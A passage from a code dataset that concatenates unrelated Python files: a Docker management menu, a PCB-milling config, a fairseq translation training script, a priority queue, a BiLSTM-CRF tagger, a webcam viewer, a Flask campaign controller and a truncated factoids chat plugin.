sp.getoutput(\"docker ps\")\n print(\"LIST OF CONTAINERS RUNNING\")\n print(all_cont)\n cont_name = input(\"ENTER THE NAME OF CONTAINER TO BE STOPPED: \")\n cont_stop = sp.getoutput(\"docker stop {}\".format(cont_name))\n print(cont_stop)\n clear = sp.run(\"clear\",shell=True)\n check_stop_cont = sp.getoutput(\"docker ps\")\n print(check_stop_cont)\n elif opt == 3:\n all_cont = sp.getoutput(\"docker ps -a\")\n print(all_cont)\n rm_cont_name = input(\"IF ALL WANT TO REMOVE TYPE all or ENTER THE NAME OF CONTAINER TO BE REMOVED: \")\n if rm_cont_name == \"all\":\n rm_cont = sp.getoutput(\"docker rm `docker ps -a`\")\n else:\n rm_cont = sp.getoutput(\"docker rm {}\".format(rm_cont_name))\n print(rm_cont)\n check_rm_cont = sp.getoutput(\"docker ps -a\")\n print(check_rm_cont)\n elif opt == 4:\n all_img = sp.getoutput(\"docker images\")\n print(all_img)\n rm_img_name = input(\"IF ALL WANT TO REMOVE TYPE all OR ENTER NAME OF IMAGE TO BE DELETED: \")\n if rm_img_name == \"all\":\n rm_img = sp.getoutput(\"docker rmi `docker images -q` --force\")\n else:\n rm_img = sp.getoutput(\"docker rmi {}\".format(rm_img_name))\n print(rm_img)\n check_rm_img = sp.getoutput(\"docker images\")\n print(check_rm_img)\n elif opt == 5:\n all_img_present = sp.getoutput(\"docker images\")\n print(\"LIST OF ALL CONTAINERS PRESENT\")\n print(all_img_present)\n pull_img_name = input(\"ENTER NAME OF IMAGE TO BE PULLED: \")\n pull_img = sp.getoutput(\"docker pull {}\".format(pull_img_name))\n print(pull_img)\n check_pull_img = sp.getoutput(\"docker images\")\n print(check_pull_img)\n elif opt == 6:\n break;\n ch = input(\"WOULD YOU LIKE TO CONTINUE?[Y/N]: \")\n if ch != 'Y':\n break\n cnt+=1\n else:\n break","sub_path":"linuxAutomation/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"117032201","text":"#Tue Sep 10 16:06:10 EST 2013\nN_copies_Y=2\nN_copies_X=2\nZ_origin_offset=0\nshowEtch3=0\nshowEtch2=0\nshowEtch=1\nGRID_N_POINTS=(4,4)\nBAUDRATE=115200\nminDistance=0.001**2 \nmaxDistance=1**2 \nZlift_milling=1.0\nfilePath=\"C:/temp/out/\"\nF_fastMove=70000\nEmulate=True\nrunInGui=True\nshowDrill=0\nF_slowMove=20000\nfavouritesPath=\"C:/Users/dutoitk.FLITECH/Dropbox/Cyclone-PCB-Factory-master/favourites/\"\nZ_PROBING_FILE=\"Z_probing_data.p\"\nmargin_copies_Y=5\ninitial_Z_lowering_distance=-5\nDEVICE=\"COM3\"\nmargin_copies_X=5\nshowEdge=0\nZ_global_offset=0\nZlift=0.5\nfileName=\"Encoder_Board\"\n","sub_path":"Software/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"434077532","text":"#!/usr/bin/env python3 -u\n# Copyright (c) 2017-present, Facebook, Inc.\n# All rights reserved.\n#\n# This source code is licensed under the license found in the LICENSE file in\n# the root directory of this source tree. An additional grant of patent rights\n# can be found in the PATENTS file in the same directory.\n\"\"\"\nTrain a new model on one or across multiple GPUs.\n\"\"\"\n\nimport collections\nimport math\nimport os\nimport random\nimport torch\nimport subprocess\nimport re\nimport copy\nfrom fairseq import checkpoint_utils, distributed_utils, options, progress_bar, tasks, utils, bleu\nfrom fairseq.data import iterators\nfrom fairseq.trainer import Trainer\nfrom fairseq.meters import AverageMeter, StopwatchMeter\nimport numpy as np\n\n\ndef main(args, init_distributed=False):\n utils.import_user_module(args)\n\n assert args.max_tokens is not None or args.max_sentences is not None, \\\n 'Must specify batch size either with --max-tokens or --max-sentences'\n\n # Initialize CUDA and distributed training\n if torch.cuda.is_available() and not args.cpu:\n torch.cuda.set_device(args.device_id)\n torch.manual_seed(args.seed)\n if init_distributed:\n args.distributed_rank = distributed_utils.distributed_init(args)\n\n # Print args\n print(args)\n\n # Setup task, e.g., translation, language modeling, etc.\n task = tasks.setup_task(args)\n\n # Load valid dataset (we load training data below, based on the latest checkpoint)\n for valid_sub_split in args.valid_subset.split(','):\n task.load_dataset(valid_sub_split, combine=True, epoch=0)\n\n # Build model and criterion\n model = task.build_model(args)\n criterion = task.build_criterion(args)\n print(model)\n print('| model {}, criterion {}'.format(args.arch, criterion.__class__.__name__))\n print('| num. model params: {} (num. trained: {})'.format(\n sum(p.numel() for p in model.parameters()),\n sum(p.numel() for p in model.parameters() if p.requires_grad),\n ))\n\n # added by wxjiao: load bilingual pairs\n src_dict = task.source_dictionary.__dict__['indices']\n tgt_dict = task.target_dictionary.__dict__['indices']\n slang, tlang = args.source_lang, args.target_lang\n st_path = 'bildict/{}-{}/{}-{}.align.txt'.format(slang, tlang, slang, tlang)\n st_aligners, st_prob = get_stpairs(st_path, src_dict, tgt_dict, alpha=0.75) # LongTensor\n print('| bilingual pairs {}; top-5 probs {}'.format(st_aligners.shape[0], st_prob[:5]))\n\n\n # Build trainer\n trainer = Trainer(args, task, model, criterion)\n print('| training on {} GPUs'.format(args.distributed_world_size))\n print('| max tokens per GPU = {} and max sentences per GPU = {}'.format(\n args.max_tokens,\n args.max_sentences,\n ))\n\n #slhe, added for generation\n assert not args.sampling or args.nbest == args.beam, \\\n '--sampling requires --nbest to be equal to --beam'\n assert args.replace_unk is None or args.raw_text, \\\n '--replace-unk requires a raw text dataset (--raw-text)'\n # assert args.gen_subset\n # task.load_dataset(args.gen_subset)\n\n # Load the latest checkpoint if one is available and restore the\n # corresponding train iterator\n extra_state, epoch_itr = checkpoint_utils.load_checkpoint(args, trainer)\n\n # by wxjiao\n print('| Truly trained num. model params: {}'.format(\n sum(p.numel() for p in trainer.model.parameters() if p.requires_grad)))\n\n # Train until the learning rate gets too small\n max_epoch = args.max_epoch or math.inf\n max_update = args.max_update or math.inf\n lr = trainer.get_lr()\n train_meter = StopwatchMeter()\n train_meter.start()\n valid_losses = [None]\n valid_subsets = args.valid_subset.split(',')\n while lr > args.min_lr and epoch_itr.epoch < max_epoch and trainer.get_num_updates() < max_update:\n # train for one epoch\n train(args, trainer, task, epoch_itr, st_aligners, st_prob)\n\n if not args.disable_validation and epoch_itr.epoch % args.validate_interval == 0:\n valid_losses = validate(args, trainer, task, epoch_itr, valid_subsets)\n else:\n valid_losses = [None]\n\n # only use first validation loss to update the learning rate\n lr = trainer.lr_step(epoch_itr.epoch, valid_losses[0])\n\n # save checkpoint\n if epoch_itr.epoch % args.save_interval == 0:\n checkpoint_utils.save_checkpoint(args, trainer, epoch_itr, valid_losses[0])\n\n if ':' in getattr(args, 'data', ''):\n # sharded data: get train iterator for next epoch\n epoch_itr = trainer.get_train_iterator(epoch_itr.epoch)\n train_meter.stop()\n print('| done training in {:.1f} seconds'.format(train_meter.sum))\n\n\n# added by wxjiao: get the biligual pairs\ndef get_stpairs(st_path, src_dict, tgt_dict, alpha=1.0):\n st_aligners = []\n s_prob = []\n t_prob = []\n with open(st_path, 'r') as f:\n for line in f:\n src_l, tgt_l, ps_l, pt_l = line.strip('\\n').split(' ')\n if src_l in src_dict and tgt_l in tgt_dict:\n st_aligners.append([src_dict[src_l], tgt_dict[tgt_l]])\n s_prob.append(int(ps_l))\n t_prob.append(int(pt_l))\n st_aligners = np.array(st_aligners, dtype=int)\n s_prob = np.array(s_prob, dtype=float)\n s_prob = s_prob ** alpha / np.sum(s_prob ** alpha, axis=0, keepdims=True)\n t_prob = np.array(t_prob, dtype=float)\n t_prob = t_prob ** alpha / np.sum(t_prob ** alpha, axis=0, keepdims=True)\n st_prob = (s_prob * t_prob)**0.5\n st_prob = st_prob / np.sum(st_prob)\n return st_aligners, st_prob\n\n\n#def train(args, trainer, task, epoch_itr, st_aligners):\n# modified by wxjiao: add one more arg -- st_aligners\ndef train(args, trainer, task, epoch_itr, st_aligners, st_prob):\n \"\"\"Train the model for one epoch.\"\"\"\n # Update parameters every N batches\n update_freq = args.update_freq[epoch_itr.epoch - 1] \\\n if epoch_itr.epoch <= len(args.update_freq) else args.update_freq[-1]\n\n # Initialize data iterator\n itr = epoch_itr.next_epoch_itr(\n fix_batches_to_gpus=args.fix_batches_to_gpus,\n shuffle=(epoch_itr.epoch >= args.curriculum),\n )\n itr = iterators.GroupedIterator(itr, update_freq)\n progress = progress_bar.build_progress_bar(\n args, itr, epoch_itr.epoch, no_progress_bar='simple',\n )\n\n extra_meters = collections.defaultdict(lambda: AverageMeter())\n valid_subsets = args.valid_subset.split(',')\n max_update = args.max_update or math.inf\n\n # added by wxjiao\n K_buf = 1 # lambda 36.0\n sample_buf = []\n for i, samples in enumerate(progress, start=epoch_itr.iterations_in_epoch):\n #log_output = trainer.train_step(samples)\n # modified by wxjiao: add one more arg -- st_aligners\n log_output = trainer.train_step(samples, st_aligners, st_prob, sample_buf, K_buf)\n if log_output is None:\n continue\n\n # log mid-epoch stats\n stats = get_training_stats(trainer)\n for k, v in log_output.items():\n if k in ['loss', 'nll_loss', 'ntokens', 'nsentences', 'sample_size', 'sample_status']:\n continue # these are already logged above\n if 'loss' in k:\n extra_meters[k].update(v, log_output['sample_size'])\n else:\n extra_meters[k].update(v)\n stats[k] = extra_meters[k].avg\n progress.log(stats, tag='train', step=stats['num_updates'])\n\n # ignore the first mini-batch in words-per-second calculation\n if i == 0:\n trainer.get_meter('wps').reset()\n\n num_updates = trainer.get_num_updates()\n if (\n not args.disable_validation\n and args.save_interval_updates > 0\n and num_updates % args.save_interval_updates == 0\n and num_updates > 0\n ):\n valid_losses = validate(args, trainer, task, epoch_itr, valid_subsets)\n checkpoint_utils.save_checkpoint(args, trainer, epoch_itr, valid_losses[0])\n print(\"dictionary size is {}, {}\".format(len(task.source_dictionary), len(task.target_dictionary)))\n if num_updates >= max_update:\n break\n\n # log end-of-epoch stats\n stats = get_training_stats(trainer)\n for k, meter in extra_meters.items():\n stats[k] = meter.avg\n progress.print(stats, tag='train', step=stats['num_updates'])\n\n # reset training meters\n for k in [\n 'train_loss', 'train_nll_loss', 'wps', 'ups', 'wpb', 'bsz', 'gnorm', 'clip',\n ]:\n meter = trainer.get_meter(k)\n if meter is not None:\n meter.reset()\n\ndef get_training_stats(trainer):\n stats = collections.OrderedDict()\n stats['loss'] = trainer.get_meter('train_loss')\n if trainer.get_meter('train_nll_loss').count > 0:\n nll_loss = trainer.get_meter('train_nll_loss')\n stats['nll_loss'] = nll_loss\n else:\n nll_loss = trainer.get_meter('train_loss')\n stats['ppl'] = utils.get_perplexity(nll_loss.avg)\n stats['wps'] = trainer.get_meter('wps')\n stats['ups'] = trainer.get_meter('ups')\n stats['wpb'] = trainer.get_meter('wpb')\n stats['bsz'] = trainer.get_meter('bsz')\n stats['num_updates'] = trainer.get_num_updates()\n stats['lr'] = trainer.get_lr()\n stats['gnorm'] = trainer.get_meter('gnorm')\n stats['clip'] = trainer.get_meter('clip')\n stats['oom'] = trainer.get_meter('oom')\n if trainer.get_meter('loss_scale') is not None:\n stats['loss_scale'] = trainer.get_meter('loss_scale')\n stats['wall'] = round(trainer.get_meter('wall').elapsed_time)\n stats['train_wall'] = trainer.get_meter('train_wall')\n return stats\n\n\ndef validate(args, trainer, task, epoch_itr, subsets):\n \"\"\"Evaluate the model on the validation set(s) and return the losses.\"\"\"\n valid_losses = []\n valid_bleus = []\n for subset in subsets:\n # Initialize data iterator\n\n if args.sacrebleu:\n scorer = bleu.SacrebleuScorer()\n else:\n tgt_dict = task.target_dictionary\n scorer = bleu.Scorer(tgt_dict.pad(), tgt_dict.eos(), tgt_dict.unk())\n\n src_dict_dup, tgt_dict_dup = task.dict_dup()\n\n itr = task.get_batch_iterator(\n dataset=task.dataset(subset),\n max_tokens=args.max_tokens,\n max_sentences=args.max_sentences_valid,\n max_positions=utils.resolve_max_positions(\n task.max_positions(),\n trainer.get_model().max_positions(),\n ),\n ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,\n required_batch_size_multiple=args.required_batch_size_multiple,\n seed=args.seed,\n num_shards=args.distributed_world_size,\n shard_id=args.distributed_rank,\n num_workers=args.num_workers,\n ).next_epoch_itr(shuffle=False)\n\n progress = progress_bar.build_progress_bar(\n args, itr, epoch_itr.epoch,\n prefix='valid on \\'{}\\' subset'.format(subset),\n no_progress_bar='simple'\n )\n\n # reset validation loss meters\n for k in ['valid_loss', 'valid_nll_loss', 'valid_bleu']:\n meter = trainer.get_meter(k)\n if meter is not None:\n meter.reset()\n extra_meters = collections.defaultdict(lambda: AverageMeter())\n\n all_generation_output = []\n #import time; t1 = time.time()\n #print(\"start validation on {} data with {} batch\".format(subset, len(itr))\n count = 0\n for sample in progress:\n #count+=1\n #if count%100 == 0:\n # print(\"batch: \", count)\n log_output, generation_output = trainer.valid_step(sample, src_dict_dup, tgt_dict_dup, scorer=scorer)\n all_generation_output.append(generation_output)\n for k, v in log_output.items():\n if k in ['loss', 'nll_loss', 'ntokens', 'nsentences', 'sample_size', 'sample_status']:\n continue\n extra_meters[k].update(v)\n #print(\"finish validation using {} seconds\".format(time.time()-t1))\n if len(all_generation_output) != 0:\n all_generation_output = [gen for gen_list in all_generation_output for gen in gen_list]\n print(\"| Evaluate {} samples from {} data\".format(len(all_generation_output), subset))\n print(\"| {}\".format(scorer.result_string()))\n if args.distributed_rank == 0:\n gene_save_dir = save_gene_file(args, all_generation_output, trainer, epoch_itr)\n bleu_res = external_eval(gene_save_dir, multi_ref=False)\n # log validation stats\n trainer.get_meter('valid_bleu').update(bleu_res)\n stats = get_valid_stats(trainer)\n for k, meter in extra_meters.items():\n stats[k] = meter.avg\n stats['bleu'] = stats['bleu'].avg\n progress.print(stats, tag=subset, step=trainer.get_num_updates())\n valid_losses.append(stats['loss'].avg)\n scorer.reset()\n\n return valid_losses\n\ndef external_eval(gene_save_dir, multi_ref=False):\n print(\"| Evaluate using external metric\")\n hypo_path = gene_save_dir + 'hypo.txt'\n if multi_ref:\n raise NotImplementedError\n else:\n target_path = gene_save_dir + 'target.txt'\n eval_cmd = \"perl ./scripts/multi-bleu.perl %s < %s\"%(target_path, hypo_path)\n # print(eval_cmd)\n output = subprocess.check_output(eval_cmd, shell=True).decode(\"utf-8\")\n print(\"| \" + output)\n p = re.compile(\"BLEU = \\d+\\.\\d+,\")\n bleu_res = float(p.search(output).group(0).replace(',', '').replace('BLEU = ', ''))\n return bleu_res\n\ndef save_gene_file(args, generation_list, trainer, epoch_itr):\n if args.results_path is not None:\n epoch = epoch_itr.epoch\n end_of_epoch = epoch_itr.end_of_epoch()\n updates = trainer.get_num_updates()\n\n gene_folder = 'gene/'\n save_folder = os.path.join(args.results_path, gene_folder)\n if not os.path.exists(save_folder):\n os.makedirs(save_folder, exist_ok=True)\n\n if end_of_epoch and not args.no_epoch_checkpoints and epoch % args.save_interval == 0:\n file_prefix = 'trans_cp_{}_'.format(epoch)\n elif not end_of_epoch and args.save_interval_updates > 0 and updates % args.save_interval_updates == 0:\n file_prefix = 'trans_cp_{}_{}_'.format(epoch, updates)\n else:\n raise NotImplementedError\n\n save_dir = os.path.join(save_folder, file_prefix)\n print('| Save generation results into path %s' % save_dir)\n else:\n print('Save path is not specified, will not save the generation results')\n return\n hypo_file_path = save_dir + 'hypo.txt'\n target_file_path = save_dir + 'target.txt'\n hypo_file = open(hypo_file_path, 'w')\n target_file = open(target_file_path, 'w')\n\n sorted(generation_list, key=lambda x: x[0])\n for item in generation_list:\n hypo_file.write(item[1] + '\\n')\n target_file.write(item[2] + '\\n')\n hypo_file.close()\n target_file.close()\n return save_dir\n\ndef get_valid_stats(trainer):\n stats = collections.OrderedDict()\n stats['loss'] = trainer.get_meter('valid_loss')\n stats['bleu'] = trainer.get_meter('valid_bleu')\n if trainer.get_meter('valid_nll_loss').count > 0:\n nll_loss = trainer.get_meter('valid_nll_loss')\n stats['nll_loss'] = nll_loss\n else:\n nll_loss = stats['loss']\n stats['ppl'] = utils.get_perplexity(nll_loss.avg)\n stats['num_updates'] = trainer.get_num_updates()\n if hasattr(checkpoint_utils.save_checkpoint, 'best'):\n stats['best_loss'] = min(\n checkpoint_utils.save_checkpoint.best, stats['loss'].avg)\n return stats\n\n\ndef distributed_main(i, args, start_rank=0):\n args.device_id = i\n if args.distributed_rank is None: # torch.multiprocessing.spawn\n args.distributed_rank = start_rank + i\n main(args, init_distributed=True)\n\n\ndef cli_main():\n parser = options.get_training_parser()\n args = options.parse_args_and_arch(parser)\n\n if args.distributed_init_method is None:\n distributed_utils.infer_init_method(args)\n\n if args.distributed_init_method is not None:\n # distributed training\n if torch.cuda.device_count() > 1 and not args.distributed_no_spawn:\n start_rank = args.distributed_rank\n args.distributed_rank = None # assign automatically\n torch.multiprocessing.spawn(\n fn=distributed_main,\n args=(args, start_rank),\n nprocs=torch.cuda.device_count(),\n )\n else:\n distributed_main(args.device_id, args)\n elif args.distributed_world_size > 1:\n # fallback for single node with multiple GPUs\n assert args.distributed_world_size <= torch.cuda.device_count()\n port = random.randint(10000, 20000)\n args.distributed_init_method = 'tcp://localhost:{port}'.format(port=port)\n args.distributed_rank = None # set based on device id\n if max(args.update_freq) > 1 and args.ddp_backend != 'no_c10d':\n print('| NOTE: you may get better performance with: --ddp-backend=no_c10d')\n torch.multiprocessing.spawn(\n fn=distributed_main,\n args=(args, ),\n nprocs=args.distributed_world_size,\n )\n else:\n # single GPU training\n main(args)\n\n\nif __name__ == '__main__':\n cli_main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":17489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"428091064","text":"import heapq as hpq\nimport itertools\n\n\nclass PriorityQueueSet:\n \"\"\"\n Combined priority queue and set data structure.\n\n The dictionary wrapper guarantees:\n - a unique set of items\n - the possibility to search for items\n\n and as a result:\n - the possibility to update the priority of an already existing item\n\n\n Provides O(1) membership test, O(log N) insertion and O(log N) removal of the smallest item.\n\n Important: the items of this data structure must be both comparable and\n hashable (i.e. must implement __cmp__ and __hash__). This is true of\n Python's built-in objects, but you should implement those methods if you\n want to use the data structure for custom objects.\n \"\"\"\n\n # placeholder for a removed task\n REMOVED = '<removed-task>'\n\n def __init__(self, items=None):\n \"\"\"\n Create a new PriorityQueueSet.\n\n Arguments:\n items (list): An initial item list - it can be unsorted and\n non-unique. The data structure will be created in O(N).\n\n Attributes:\n self.set: dictionary wrapper for the heap\n self.heap: the actual priority queue\n self.counter: unique sequence count\n \"\"\"\n\n if items is None:\n items = []\n self.set = dict((item, []) for item in items)\n self.heap = list(self.set.keys())\n hpq.heapify(self.heap)\n self.counter = itertools.count()\n\n def has_item(self, item):\n \"\"\"Check if ``item`` exists in the queue.\"\"\"\n return item in self.set\n\n def get_priority(self, item):\n \"\"\"Get the priority of ``item`` if it exists.\"\"\"\n try:\n return self.set[item][0]\n except KeyError:\n print(\"Can't get priority of non-existing item\")\n\n def pop(self):\n \"\"\"Remove and return the lowest priority task. Raise KeyError if empty.\"\"\"\n while self.heap:\n priority, count, smallest = hpq.heappop(self.heap)\n if smallest is not self.REMOVED:\n del self.set[smallest]\n return priority, smallest\n raise KeyError('pop from an empty priority queue')\n\n def remove(self, item):\n \"\"\"Mark an existing task as REMOVED.\"\"\"\n try:\n entry = self.set.pop(item)\n entry[-1] = self.REMOVED\n except KeyError:\n print(\"Can't remove a non-existing item\")\n\n def add(self, item, priority=0):\n \"\"\"Add a new item or update the priority of an existing task\"\"\"\n if item in self.set:\n self.remove(item)\n count = next(self.counter)\n entry = [priority, count, item]\n self.set[item] = entry\n hpq.heappush(self.heap, entry)\n","sub_path":"taquin/algorithm/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"35667840","text":"import tensorflow as tf\nimport numpy as np\nfrom lavd.shares import BaseModel, BiRNN, CharCNNHW, CRF, Embedding\nfrom utils.logger import Progbar\n\n\nclass BiLSTMCRFModel(BaseModel):\n def __init__(self, config):\n super(BiLSTMCRFModel, self).__init__(config)\n self._init_configs()\n with tf.Graph().as_default():\n self._add_placeholders()\n self._build_model()\n self.logger.info(\"total params: {}\".format(self.count_params()))\n self._initialize_session()\n\n def _init_configs(self):\n vocab = self.load_dataset(self.cfg.vocab)\n self.word_dict, self.char_dict, self.label_dict = vocab[\"word_dict\"], vocab[\"char_dict\"], vocab[\"label_dict\"]\n del vocab\n self.word_size, self.char_size, self.label_size = len(self.word_dict), len(self.char_dict), len(self.label_dict)\n self.rev_word_dict = dict([(idx, word) for word, idx in self.word_dict.items()])\n self.rev_char_dict = dict([(idx, char) for char, idx in self.char_dict.items()])\n self.rev_label_dict = dict([(idx, tag) for tag, idx in self.label_dict.items()])\n\n def _get_feed_dict(self, data, is_train=False, lr=None):\n feed_dict = {self.words: data[\"words\"], self.seq_len: data[\"seq_len\"], self.chars: data[\"chars\"],\n self.char_seq_len: data[\"char_seq_len\"]}\n if \"labels\" in data:\n feed_dict[self.labels] = data[\"labels\"]\n feed_dict[self.is_train] = is_train\n if lr is not None:\n feed_dict[self.lr] = lr\n return feed_dict\n\n def _add_placeholders(self):\n self.words = tf.placeholder(tf.int32, shape=[None, None], name=\"words\")\n self.seq_len = tf.placeholder(tf.int32, shape=[None], name=\"seq_len\")\n self.chars = tf.placeholder(tf.int32, shape=[None, None, None], name=\"chars\")\n self.char_seq_len = tf.placeholder(tf.int32, shape=[None, None], name=\"char_seq_len\")\n self.labels = tf.placeholder(tf.int32, shape=[None, None], name=\"labels\")\n # hyper-parameters\n self.is_train = tf.placeholder(tf.bool, shape=[], name=\"is_train\")\n self.lr = tf.placeholder(tf.float32, name=\"learning_rate\")\n\n def _build_model(self):\n with tf.variable_scope(\"embeddings_op\"):\n # word table\n word_table = Embedding(self.word_size, self.cfg.word_dim, self.cfg.wordvec, self.cfg.tune_emb,\n self.cfg.word_project, scope=\"word_table\")\n word_emb = word_table(self.words)\n # char table\n char_table = Embedding(self.char_size, self.cfg.char_dim, None, True, False, scope=\"char_table\")\n char_emb = char_table(self.chars)\n\n with tf.variable_scope(\"computation_graph\"):\n # create module\n emb_dropout = tf.layers.Dropout(rate=self.cfg.emb_drop_rate)\n rnn_dropout = tf.layers.Dropout(rate=self.cfg.rnn_drop_rate)\n char_tdnn_hw = CharCNNHW(self.cfg.char_kernels, self.cfg.char_kernel_features, self.cfg.char_dim,\n self.cfg.highway_layers, padding=\"VALID\", activation=tf.nn.tanh, use_bias=True,\n hw_activation=tf.nn.tanh, reuse=False, scope=\"char_tdnn_hw\")\n bi_rnn = BiRNN(self.cfg.num_units, concat=self.cfg.concat_rnn, reuse=tf.AUTO_REUSE, scope=\"bi_rnn\")\n crf_layer = CRF(self.label_size, reuse=False, scope=\"crf\")\n\n # compute logits\n char_cnn = char_tdnn_hw(char_emb)\n emb = emb_dropout(tf.concat([word_emb, char_cnn], axis=-1), training=self.is_train)\n rnn_outputs, _ = bi_rnn(emb, self.seq_len)\n rnn_outputs = rnn_dropout(rnn_outputs, training=self.is_train)\n self.logits, self.transition, self.loss = crf_layer(rnn_outputs, self.labels, self.seq_len)\n\n optimizer = self._build_optimizer()\n if self.cfg.grad_clip is not None and self.cfg.grad_clip > 0:\n grads, vs = zip(*optimizer.compute_gradients(self.loss))\n grads, _ = tf.clip_by_global_norm(grads, self.cfg.grad_clip)\n self.train_op = optimizer.apply_gradients(zip(grads, vs))\n else:\n self.train_op = optimizer.minimize(self.loss)\n\n def _predict_op(self, data):\n feed_dict = self._get_feed_dict(data)\n logits, transition, seq_len = self.sess.run([self.logits, self.transition, self.seq_len], feed_dict=feed_dict)\n return self.viterbi_decode(logits, transition, seq_len)\n\n def train(self, dataset):\n self.logger.info(\"Start training...\")\n best_f1, no_imprv_epoch, init_lr, lr, cur_step = -np.inf, 0, self.cfg.lr, self.cfg.lr, 0\n for epoch in range(1, self.cfg.epochs + 1):\n self.logger.info(\"Epoch {}/{}:\".format(epoch, self.cfg.epochs))\n prog = Progbar(target=dataset.get_num_batches())\n for i, data in enumerate(dataset.get_data_batches()):\n cur_step += 1\n feed_dict = self._get_feed_dict(data, is_train=True, lr=lr)\n _, train_loss = self.sess.run([self.train_op, self.loss], feed_dict=feed_dict)\n prog.update(i + 1, [(\"Global Step\", int(cur_step)), (\"Train Loss\", train_loss)])\n # learning rate decay\n if self.cfg.use_lr_decay:\n if self.cfg.decay_step:\n lr = max(init_lr / (1.0 + self.cfg.lr_decay * epoch / self.cfg.decay_step), self.cfg.minimal_lr)\n # evaluate\n score = self.evaluate(dataset.get_data_batches(\"dev\"), name=\"dev\")\n self.evaluate(dataset.get_data_batches(\"test\"), name=\"test\")\n if score[\"FB1\"] > best_f1:\n best_f1, no_imprv_epoch = score[\"FB1\"], 0\n self.save_session(epoch)\n self.logger.info(\" -- new BEST score on dev dataset: {:04.2f}\".format(best_f1))\n else:\n no_imprv_epoch += 1\n if self.cfg.no_imprv_tolerance is not None and no_imprv_epoch >= self.cfg.no_imprv_tolerance:\n self.logger.info(\"early stop at {}th epoch without improvement\".format(epoch))\n self.logger.info(\"best score on dev set: {}\".format(best_f1))\n break\n\n def evaluate(self, dataset, name):\n all_data = list()\n for data in dataset:\n predicts = self._predict_op(data)\n all_data.append((data[\"labels\"], predicts, data[\"words\"], data[\"seq_len\"]))\n return self.evaluate_f1(all_data, self.rev_word_dict, self.rev_label_dict, name)\n","sub_path":"lavd/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":6558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"19162620","text":"#!/usr/bin/env python\nimport cv2\n\n\"\"\"This program exists to show the syntax used by OpenCV to capture\nand display a camera feed to a window\"\"\"\n\ndef display_webcam():\n # capturing video from camera, storing in 'cap'. 0 selects the camera\n\n cap = cv2.VideoCapture(0)\n\n while True:\n # frame gets the next frame in the camera via cap\n # ret is a boolean for success of capturing frame\n ret, frame = cap.read()\n print(type(frame))\n cv2.imshow('This is a window!!', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n print('An error occured')\n break\n cap.release()\n cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n display_webcam()\n","sub_path":"video_display.py","file_name":"video_display.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"576948767","text":"from json import dumps, loads\nfrom models.campaign import Campaign\nfrom flask_restplus import reqparse\n\nclass CampaignController:\n def __init__(self, request):\n self.request = request\n\n def new(self):\n\n parser = reqparse.RequestParser()\n parser.add_argument('name', required=True)\n parser.add_argument('gameMaster', required=True)\n parser.add_argument('players', action='append')\n parser.add_argument('characters', action='append')\n parser.add_argument('rules', action='append')\n parse_result = parser.parse_args(req=self.request)\n\n campaign = Campaign.from_json(dumps(parse_result)).save()\n\n return \"{}\".format(campaign.id)\n\n @staticmethod\n def list():\n list_of_campaigns = list(map(lambda campaign: loads(campaign.to_json()), Campaign.objects.all()))\n return list_of_campaigns\n\n @staticmethod\n def get_element_detail(identifier):\n return Campaign.objects.get(id=identifier).to_json()\n \n def edit(self, identifier):\n campaign = Campaign.objects.get(id=identifier)\n parser = reqparse.RequestParser()\n parser.add_argument('name', required=False)\n parser.add_argument('gameMaster', required=False)\n parser.add_argument('players', required=False)\n parser.add_argument('characters', required=False)\n parser.add_argument('rules', required=False)\n parse_result = parser.parse_args(req=self.request)\n\n filtered_result = {k: v for k, v in parse_result.items() if v is not None}\n \n no_docs_updated = campaign.update(**filtered_result)\n\n if no_docs_updated == 1:\n new_campaign = Campaign.objects.get(id=identifier)\n return loads(new_campaign.to_json())\n \n @staticmethod\n def delete(id):\n target = Campaign.objects.get(id=id)\n target_data = loads(target.to_json())\n target.delete()\n\n return target_data","sub_path":"services/campaigns/controller/campaign_controller.py","file_name":"campaign_controller.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"57417407","text":"#Don't care if factoids isn't a word.\n#Enjoy the plugin!\n#TODO Implement \"|\"\n#TODO Restructure to detect who set the factoid, and maybe to support additional information\nplugName = 'Factoids'\n\nfact_prefix = '\\''\nfact_setPermissions = 0 #Permissions required to set factoids\nfact_usePermissions = 0 #Permissions required to use set factoids\n\ndef fact_isValid(msg, protocol):\n if len(msg) < 9:\n return 'Factoid too short.'\n elif msg[:7] != '<reply>':\n if protocol == 'irc' or protocol == 'furc':\n if msg[:8] == '<action>':\n return True\n else:\n return 'Factoid doesn\\'t begin with \"<reply>\" or \"<action>\".'\n else:\n return 'Factoid doesn\\'t begin with \"<reply>\".'\n return True\n\ndef fact_getResponse(msg, protocol):\n if msg[:7] != '<reply>' and msg[:8] == '<action>':\n if protocol == 'irc':\n return '\\x01ACTION ' + msg[8:] + '\\x01'\n elif protocol == 'furc':\n return ':' + msg[8:]\n else:\n return msg[7:]\n return False\n\ndef fact_remember(inMSG):\n if getPermission(inMSG) < fact_setPermissions:\n return\n\n splitMSG = inMSG[0].split(None, 2)\n if len(splitMSG) != 3:\n return\n\n conn = sqlite3.connect(dbLoc)\n\n if getSetting('Facts', splitMSG[1], conn):\n conn.close()\n return 'Factoid \"'+splitMSG[1]+'\" already exists.'\n\n validResponse = fact_isValid(splitMSG[2], inMSG[1])\n\n if validResponse != True:\n conn.close()\n return validResponse\n\n setSetting('Facts', splitMSG[1], (splitMSG[2],), ('Value',), conn)\n conn.close()\n return 